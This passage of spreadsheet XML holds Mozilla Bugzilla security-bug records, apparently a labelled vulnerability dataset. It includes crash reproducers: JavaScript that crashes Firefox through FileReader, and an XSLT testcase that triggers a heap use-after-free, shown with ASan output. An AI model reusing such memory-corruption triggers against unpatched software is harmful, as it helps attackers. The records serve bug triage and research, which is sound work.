      <c r="M2101" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2101" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2101" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2101" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q2101" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2101" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2101" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T2101" t="n">
        <v>1</v>
      </c>
      <c r="U2101" t="n">
        <v>0</v>
      </c>
      <c r="V2101" t="n">
        <v>19</v>
      </c>
      <c r="W2101" t="inlineStr">
        <is>
          <t>Android's nsWindow doesn't hold itself and doesn't check whether it's destroying or not after dispatching an event. I'm not sure that actually causes crash bugs. We should research it.
nsWindow might be destroyed by DOM event handler. Mac's widget has fixed this already but I'm not sure the detail and bug#. Steven probably knows the bug#.
I think nsWindow for Android should do:
+    nsRefPtr&lt;nsWindow&gt; kungFuDeathGrip(this);
     DispatchEvent(event);
+    if (Destroyed()) {
+        return;
+    }
And:
nsWindow should set nsBaseWidget::mOnDestroyCalled to TRUE when it's destroying.
# It seems that nsBaseWidget::OnDestroy() should be called too...</t>
        </is>
      </c>
      <c r="X2101" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2102">
      <c r="A2102" t="n">
        <v>605672</v>
      </c>
      <c r="B2102" t="inlineStr">
        <is>
          <t>2010-10-19 17:08:40 -0700</t>
        </is>
      </c>
      <c r="C2102" t="inlineStr">
        <is>
          <t>"ASSERTION: Incorrect scope passed"</t>
        </is>
      </c>
      <c r="D2102" t="inlineStr">
        <is>
          <t>2011-06-20 18:08:31 -0700</t>
        </is>
      </c>
      <c r="E2102" t="n">
        <v>1</v>
      </c>
      <c r="F2102" t="n">
        <v>1</v>
      </c>
      <c r="G2102" t="n">
        <v>3</v>
      </c>
      <c r="H2102" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2102" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2102" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2102" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2102" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2102" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2102" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2102" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2102" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2102" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2102" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2102" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2102" t="n">
        <v>1</v>
      </c>
      <c r="U2102" t="n">
        <v>0</v>
      </c>
      <c r="V2102" t="n">
        <v>31</v>
      </c>
      <c r="W2102" t="inlineStr">
        <is>
          <t>Created attachment 484551
testcase
###!!! ASSERTION: Incorrect scope passed: 'wrapper-&gt;GetScope() == aOldScope', file js/src/xpconnect/src/xpcwrappednative.cpp, line 1506</t>
        </is>
      </c>
      <c r="X2102" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2103">
      <c r="A2103" t="n">
        <v>1033241</v>
      </c>
      <c r="B2103" t="inlineStr">
        <is>
          <t>2014-07-02 02:16:47 -0700</t>
        </is>
      </c>
      <c r="C2103" t="inlineStr">
        <is>
          <t>Help page links to the TBPL wiki page rather than Treeherder's</t>
        </is>
      </c>
      <c r="D2103" t="inlineStr">
        <is>
          <t>2014-08-12 09:00:42 -0700</t>
        </is>
      </c>
      <c r="E2103" t="n">
        <v>1</v>
      </c>
      <c r="F2103" t="n">
        <v>1</v>
      </c>
      <c r="G2103" t="n">
        <v>7</v>
      </c>
      <c r="H2103" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2103" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2103" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K2103" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2103" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2103" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2103" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2103" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2103" t="inlineStr"/>
      <c r="Q2103" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2103" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2103" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2103" t="n">
        <v>1</v>
      </c>
      <c r="U2103" t="n">
        <v>0</v>
      </c>
      <c r="V2103" t="n">
        <v>6</v>
      </c>
      <c r="W2103" t="inlineStr">
        <is>
          <t>On:
https://treeherder.mozilla.org/ui/help.html
"More documentation available at https://wiki.mozilla.org/Sheriffing/TBPL "
Should be:
"More documentation available at https://wiki.mozilla.org/Auto-tools/Projects/Treeherder"</t>
        </is>
      </c>
      <c r="X2103" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2104">
      <c r="A2104" t="n">
        <v>945585</v>
      </c>
      <c r="B2104" t="inlineStr">
        <is>
          <t>2013-12-02 20:18:46 -0800</t>
        </is>
      </c>
      <c r="C2104" t="inlineStr">
        <is>
          <t>Crash involving nsNodeUtils::LastRelease(), possibly due to running it twice</t>
        </is>
      </c>
      <c r="D2104" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2104" t="n">
        <v>1</v>
      </c>
      <c r="F2104" t="n">
        <v>1</v>
      </c>
      <c r="G2104" t="n">
        <v>3</v>
      </c>
      <c r="H2104" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2104" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2104" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2104" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2104" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2104" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2104" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2104" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2104" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q2104" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2104" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2104" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2104" t="n">
        <v>1</v>
      </c>
      <c r="U2104" t="n">
        <v>0</v>
      </c>
      <c r="V2104" t="n">
        <v>24</v>
      </c>
      <c r="W2104" t="inlineStr">
        <is>
          <t>A user reported frequent crashes.  He provided a test case which he requested not be made public, but I can email anyone the details.  I've given them to bz.
Stack at crash time:
#0  0x000000000040fdee in jemalloc_crash ()
    at ../../../memory/mozjemalloc/jemalloc.c:1592
#1  0x000000000040e916 in arena_dalloc_small (chunk=&lt;optimised out&gt;, 
    arena=&lt;optimised out&gt;, ptr=&lt;optimised out&gt;, mapelm=&lt;optimised out&gt;)
    at ../../../memory/mozjemalloc/jemalloc.c:4610
#2  arena_dalloc (ptr=&lt;optimised out&gt;, offset=&lt;optimised out&gt;)
    at ../../../memory/mozjemalloc/jemalloc.c:4678
#3  0x00007ffff2f99b19 in nsNodeUtils::LastRelease (aNode=0x7fffbe407000)
    at ../../../../content/base/src/nsNodeUtils.cpp:193
#4  0x00007ffff2f55cc4 in nsDocument::Release (this=0x7fffbe407000)
    at ../../../../content/base/src/nsDocument.cpp:1621
#5  0x00007ffff317a024 in ~nsCOMPtr_base (this=&lt;optimised out&gt;)
    at ../../../../dist/include/nsCOMPtr.h:430
#6  ~nsCOMPtr (this=&lt;optimised out&gt;)
    at ../../../../dist/include/nsCOMPtr.h:469
#7  ~nsRefPtr (this=&lt;optimised out&gt;, this=&lt;optimised out&gt;, 
    this=&lt;optimised out&gt;, this=&lt;optimised out&gt;, this=&lt;optimised out&gt;)
    at ../../../../dist/include/nsCOMPtr.h:469
#8  TX_CompileStylesheet (aNode=&lt;optimised out&gt;, aProcessor=&lt;optimised out&gt;, 
    aCallerPrincipal=0x0, aStylesheet=0x7fffbe6944f0)
    at ../../../../../content/xslt/src/xslt/txMozillaStylesheetCompiler.cpp:744
#9  0x00007ffff317f2bf in txMozillaXSLTProcessor::NodeWillBeDestroyed (
    this=0x7fffbe6944c0, aNode=0x100000)
    at ../../../../../content/xslt/src/xslt/txMozillaXSLTProcessor.cpp:1199
#10 0x00007ffff2f99aee in nsNodeUtils::LastRelease (aNode=0x7fffbe407000)
    at ../../../../content/base/src/nsNodeUtils.cpp:188
#11 0x00007ffff2f55cc4 in nsDocument::Release (this=0x7fffbe407000)
    at ../../../../content/base/src/nsDocument.cpp:1621
#12 0x00007ffff3b82775 in ReleaseSliceNow (aSlice=&lt;optimised out&gt;, 
    aData=0x7fffbe2a4798)
    at ../../../xpcom/base/CycleCollectedJSRuntime.cpp:1064
#13 0x00007ffff3b82a06 in mozilla::IncrementalFinalizeRunnable::ReleaseNow (
    this=0x7fffbe2a4780, aLimited=true)
    at ../../../xpcom/base/CycleCollectedJSRuntime.cpp:1126
#14 0x00007ffff3b82b1f in mozilla::IncrementalFinalizeRunnable::Run (
    this=0x7fffbe2a4780)
    at ../../../xpcom/base/CycleCollectedJSRuntime.cpp:1159
#15 0x00007ffff3b7e8ec in nsThread::ProcessNextEvent (this=0x7ffff6c27f20, 
    mayWait=&lt;optimised out&gt;, result=0x7fffffff6dc0)
    at ../../../xpcom/threads/nsThread.cpp:622
#16 0x00007ffff3b4b0e8 in NS_ProcessNextEvent (thread=&lt;optimised out&gt;, 
    mayWait=true) at ../../../xpcom/glue/nsThreadUtils.cpp:238
#17 0x00007ffff2fc142b in nsXMLHttpRequest::Send (this=0x7fffc405ac00, 
    aVariant=&lt;optimised out&gt;, aBody=...)
    at ../../../../content/base/src/nsXMLHttpRequest.cpp:2915
#18 0x00007ffff3a855f7 in Nullable (aBody=..., this=&lt;optimised out&gt;, 
    this=&lt;optimised out&gt;, this=&lt;optimised out&gt;, aValue=...)
    at ../../../content/base/src/nsXMLHttpRequest.h:350
#19 Send (this=&lt;optimised out&gt;, rv=&lt;optimised out&gt;, this=&lt;optimised out&gt;, 
    aBody=...) at ../../../content/base/src/nsXMLHttpRequest.h:354
jemalloc is asserting;  it looks like a double-free or use-after-free.</t>
        </is>
      </c>
      <c r="X2104" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2105">
      <c r="A2105" t="n">
        <v>346086</v>
      </c>
      <c r="B2105" t="inlineStr">
        <is>
          <t>2006-07-27 05:36:11 -0700</t>
        </is>
      </c>
      <c r="C2105" t="inlineStr">
        <is>
          <t>[SECURITY] attachment.cgi lets you view descriptions of private attachments even when you are not in the insidergroup</t>
        </is>
      </c>
      <c r="D2105" t="inlineStr">
        <is>
          <t>2018-05-08 03:33:51 -0700</t>
        </is>
      </c>
      <c r="E2105" t="n">
        <v>1</v>
      </c>
      <c r="F2105" t="n">
        <v>1</v>
      </c>
      <c r="G2105" t="n">
        <v>4</v>
      </c>
      <c r="H2105" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2105" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2105" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K2105" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L2105" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2105" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2105" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2105" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2105" t="inlineStr">
        <is>
          <t>[ready for 2.18.6][ready for 2.20.3][ready for 2.22.1][ready for 2.23.3]</t>
        </is>
      </c>
      <c r="Q2105" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2105" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2105" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2105" t="n">
        <v>1</v>
      </c>
      <c r="U2105" t="n">
        <v>0</v>
      </c>
      <c r="V2105" t="n">
        <v>37</v>
      </c>
      <c r="W2105" t="inlineStr">
        <is>
          <t>When viewing a public attachment in the "diff" mode, i.e. an attachment not marked as "private", a user who is not in the insidergroup (the group required to view private attachments) can read *all* descriptions of attachments, including those being "private". Note that the attachment itself is correctly protected, only its description is visible.
My descriptions are rather unexploitable, because they are always of the form "patch v2 for tip", but timeless told me today that sometimes people put more useful descriptions than me. :) In this case, there is a risk (probably a low one) that someone could try to use this information to exploit the security bug (we know it's a security bug, else why would this attachment be protected?).
dveditz asked justdave in bug 330892 to set the 'insidergroup' parameter to 'security', so I think this hole should be addressed before bug 330892 is fixed, else anyone knowing this "trick" could try to use it.
I can reproduce this bug on both 2.18.5+ and tip, so all supported versions of Bugzilla are affected. Note that the fix is trivial and non-invasive. I mark the severity of this bug as "minor" as reading the description is probably much less critical than reading the patch itself.</t>
        </is>
      </c>
      <c r="X2105" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2106">
      <c r="A2106" t="n">
        <v>56236</v>
      </c>
      <c r="B2106" t="inlineStr">
        <is>
          <t>2000-10-12 04:18:29 -0700</t>
        </is>
      </c>
      <c r="C2106" t="inlineStr">
        <is>
          <t>possible to selectively allow chars into file upload control by disabling control onkeydown</t>
        </is>
      </c>
      <c r="D2106" t="inlineStr">
        <is>
          <t>2013-06-10 00:40:11 -0700</t>
        </is>
      </c>
      <c r="E2106" t="n">
        <v>1</v>
      </c>
      <c r="F2106" t="n">
        <v>1</v>
      </c>
      <c r="G2106" t="n">
        <v>3</v>
      </c>
      <c r="H2106" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2106" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2106" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2106" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2106" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2106" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N2106" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2106" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2106" t="inlineStr">
        <is>
          <t>Patch in bug 258875</t>
        </is>
      </c>
      <c r="Q2106" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2106" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2106" t="inlineStr">
        <is>
          <t>Future</t>
        </is>
      </c>
      <c r="T2106" t="n">
        <v>1</v>
      </c>
      <c r="U2106" t="n">
        <v>0</v>
      </c>
      <c r="V2106" t="n">
        <v>20</v>
      </c>
      <c r="W2106" t="inlineStr">
        <is>
          <t>I can choose what characters typed into a input type="file" are accepted by 
looking at each character typed during onkeydown, and quickly disabling and re-
enabling the control if I want to reject a character.  (Mozilla is already much 
more secure than IE with these controls, btw.)
What's Mozilla's general strategy for file controls?  From what I can tell, 
it's "make it hard for css and javascript to do things to file controls".  This 
blocks most of the methods of attack I tried, but still doesn't guarantee that 
the user is aware that something is being uploaded.</t>
        </is>
      </c>
      <c r="X2106" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2107">
      <c r="A2107" t="n">
        <v>1238440</v>
      </c>
      <c r="B2107" t="inlineStr">
        <is>
          <t>2016-01-10 21:32:10 -0800</t>
        </is>
      </c>
      <c r="C2107" t="inlineStr">
        <is>
          <t>Firefox crashes when modifying a file read by FileReader through file input</t>
        </is>
      </c>
      <c r="D2107" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2107" t="n">
        <v>1</v>
      </c>
      <c r="F2107" t="n">
        <v>1</v>
      </c>
      <c r="G2107" t="n">
        <v>3</v>
      </c>
      <c r="H2107" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2107" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2107" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2107" t="inlineStr">
        <is>
          <t>18 Branch</t>
        </is>
      </c>
      <c r="L2107" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2107" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2107" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2107" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2107" t="inlineStr">
        <is>
          <t>[adv-main45+]</t>
        </is>
      </c>
      <c r="Q2107" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2107" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2107" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T2107" t="n">
        <v>1</v>
      </c>
      <c r="U2107" t="n">
        <v>1</v>
      </c>
      <c r="V2107" t="n">
        <v>38</v>
      </c>
      <c r="W2107" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 5.1; rv:46.0) Gecko/20100101 Firefox/46.0
Build ID: 20160110030214
Steps to reproduce:
1. Make sure devtools.chrome.enabled is enabled and e10s is disabled
2. Open the browser console
3. Enter the following code
var encoder = new TextEncoder(),
    text1 = encoder.encode("hello world"),
    text2 = encoder.encode("hello world-----------------------------"),
    fileName = OS.Constants.Path.tmpDir + "\\---bug-crash-test-file.txt";
OS.File.writeAtomic(fileName, text1, {tmpPath: fileName + ".tmp"}).then(function() {
  var browser = gBrowser.getBrowserForTab(gBrowser.addTab());
  browser.addEventListener("load", function() {
    var doc = browser.contentDocument;
    doc.body.innerHTML = '&lt;input type="file" /&gt;';
    var file = doc.querySelector('input');
    file.value = fileName;
    function readFile(callback) {
      var fr = new FileReader();
      fr.onload = function() {
        var data = fr.result;
        var array = new Int8Array(data);
        if(callback) callback();
      };
      fr.readAsArrayBuffer(file.files[0]);
    }
    readFile(function() {
      OS.File.writeAtomic(fileName, text2, {tmpPath: fileName + ".tmp"}).then(function() {
        readFile();
      });
    });
  }, true);
});
Actual results:
Sometimes Firefox crashes instantly.
Sometimes you must wait a bit (like 10 seconds).
Sometimes you must enter that code multiple times (like 5 times).
But eventually it always crashes.
Expected results:
Firefox shouldn't crash.
Note I used the privileged console in order to set the value of the input automatically. But the crash also happens when selecting the file manually in non-privileged pages.
Some crash logs:
https://crash-stats.mozilla.com/report/index/855b6114-b774-4971-b18b-68eb22160111
https://crash-stats.mozilla.com/report/index/dfeaa675-5868-432f-a9fd-b703f2160111
https://crash-stats.mozilla.com/report/index/42ae483a-aeeb-402f-baed-5a6762160111
https://crash-stats.mozilla.com/report/index/075415c1-c727-4b2d-952e-3b0f72160111
https://crash-stats.mozilla.com/report/index/38405638-19c4-428e-b1df-2cf4a2160111
https://crash-stats.mozilla.com/report/index/0c435e44-4876-4440-988e-5c9102160111
Crashes reproducible on WinXP and Win7. Nighty and Stable.</t>
        </is>
      </c>
      <c r="X2107" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2108">
      <c r="A2108" t="n">
        <v>944374</v>
      </c>
      <c r="B2108" t="inlineStr">
        <is>
          <t>2013-11-28 05:36:27 -0800</t>
        </is>
      </c>
      <c r="C2108" t="inlineStr">
        <is>
          <t>Security vulnerability: CrashReporter Path Traversal</t>
        </is>
      </c>
      <c r="D2108" t="inlineStr">
        <is>
          <t>2024-05-30 08:30:30 -0700</t>
        </is>
      </c>
      <c r="E2108" t="n">
        <v>1</v>
      </c>
      <c r="F2108" t="n">
        <v>1</v>
      </c>
      <c r="G2108" t="n">
        <v>6</v>
      </c>
      <c r="H2108" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2108" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2108" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2108" t="inlineStr">
        <is>
          <t>25 Branch</t>
        </is>
      </c>
      <c r="L2108" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2108" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2108" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2108" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2108" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main28+]</t>
        </is>
      </c>
      <c r="Q2108" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2108" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2108" t="inlineStr">
        <is>
          <t>Firefox 30</t>
        </is>
      </c>
      <c r="T2108" t="n">
        <v>1</v>
      </c>
      <c r="U2108" t="n">
        <v>0</v>
      </c>
      <c r="V2108" t="n">
        <v>22</v>
      </c>
      <c r="W2108" t="inlineStr">
        <is>
          <t>Created attachment 8339914
firefoxleakage.pdf
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36
Steps to reproduce:
Technical details can be found in the attached whitepaper.
Actual results:
Technical details can be found in the attached whitepaper.
Expected results:
Technical details can be found in the attached whitepaper.</t>
        </is>
      </c>
      <c r="X2108" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2109">
      <c r="A2109" t="n">
        <v>654015</v>
      </c>
      <c r="B2109" t="inlineStr">
        <is>
          <t>2011-05-01 13:16:26 -0700</t>
        </is>
      </c>
      <c r="C2109" t="inlineStr">
        <is>
          <t>"ASSERTION: Requesting refresh driver after document has disconnected"</t>
        </is>
      </c>
      <c r="D2109" t="inlineStr">
        <is>
          <t>2011-08-03 16:30:39 -0700</t>
        </is>
      </c>
      <c r="E2109" t="n">
        <v>1</v>
      </c>
      <c r="F2109" t="n">
        <v>1</v>
      </c>
      <c r="G2109" t="n">
        <v>3</v>
      </c>
      <c r="H2109" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2109" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2109" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2109" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2109" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2109" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2109" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2109" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2109" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2109" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T2109" t="n">
        <v>1</v>
      </c>
      <c r="U2109" t="n">
        <v>0</v>
      </c>
      <c r="V2109" t="n">
        <v>50</v>
      </c>
      <c r="W2109" t="inlineStr">
        <is>
          <t>Created attachment 529377
testcase (makes Firefox assert during a subsequent GC)
1. Start Firefox (with a new profile?)
2. Load the testcase
3. Click the testcase's button
4. Quit Firefox (or force GC?)
Result: assert during shutdown
###!!! ASSERTION: Requesting refresh driver after document has disconnected!: 'Error', file  content/smil/nsSMILAnimationController.cpp, line 840
Based on hg blame for the assertion, I suspect this might be a regression from bug 653238.</t>
        </is>
      </c>
      <c r="X2109" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2110">
      <c r="A2110" t="n">
        <v>1243335</v>
      </c>
      <c r="B2110" t="inlineStr">
        <is>
          <t>2016-01-27 03:06:34 -0800</t>
        </is>
      </c>
      <c r="C2110" t="inlineStr">
        <is>
          <t>Write AV near NULL in AtomicBaseIncDec() / Heap UAF in nsAutoPtr&lt;txAXMLEventHandler&gt;::~nsAutoPtr()</t>
        </is>
      </c>
      <c r="D2110" t="inlineStr">
        <is>
          <t>2024-05-30 09:08:48 -0700</t>
        </is>
      </c>
      <c r="E2110" t="n">
        <v>1</v>
      </c>
      <c r="F2110" t="n">
        <v>1</v>
      </c>
      <c r="G2110" t="n">
        <v>3</v>
      </c>
      <c r="H2110" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2110" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2110" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K2110" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L2110" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2110" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2110" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2110" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2110" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q2110" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2110" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2110" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T2110" t="n">
        <v>1</v>
      </c>
      <c r="U2110" t="n">
        <v>0</v>
      </c>
      <c r="V2110" t="n">
        <v>19</v>
      </c>
      <c r="W2110" t="inlineStr">
        <is>
          <t>Tested on latest Firefox 44 compiled with ASan+debug
Description: depending on the XML source to be transformed, two different crashes (a heap UAF and a write to NULL) can be seen
XSLT:
&lt;xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"&gt;
 &lt;xsl:template match="*"&gt;
  &lt;xsl:variable name="v"&gt;
   &lt;xsl:text&gt;foo&lt;/xsl:text&gt;
   &lt;xsl:apply-imports/&gt;
  &lt;/xsl:variable&gt;
  &lt;xsl:attribute name="{$v}"/&gt;
  &lt;/xsl:template&gt;
&lt;/xsl:stylesheet&gt;
XML #1:
&lt;top&gt; 
&lt;zou&gt;
&lt;/zou&gt;
&lt;/top&gt;
Output #1:
AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fc03686e84e sp 0x7fffd2c36280 bp 0x7fffd2c36280 T0)
    #0 0x7fc03686e84d in std::__atomic_base&lt;int&gt;::fetch_sub(int, std::memory_order) /tools/gcc-4.7.3-0moz1/lib/gcc/x86_64-unknown-linux-gnu/4.7.3/../../../../include/c++/4.7.3/bits/atomic_base.h:582
    #1 0x7fc036864bf8 in mozilla::detail::AtomicBaseIncDec&lt;int, (mozilla::MemoryOrdering)2&gt;::operator--() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/js/src/../../dist/include/mozilla/Atomics.h:565
    #2 0x7fc036864b2e in nsStringBuffer::Release() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/xpcom/string/nsSubstring.cpp:197
    #3 0x7fc03af8449d in txTextHandler::~txTextHandler() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txTextHandler.h:12
    #4 0x7fc03af49390 in txSetVariable::execute(txExecutionState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txInstructions.cpp:808
    #5 0x7fc03af83c9d in txXSLTProcessor::execute(txExecutionState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txXSLTProcessor.cpp:49
    #6 0x7fc03af5f347 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:681
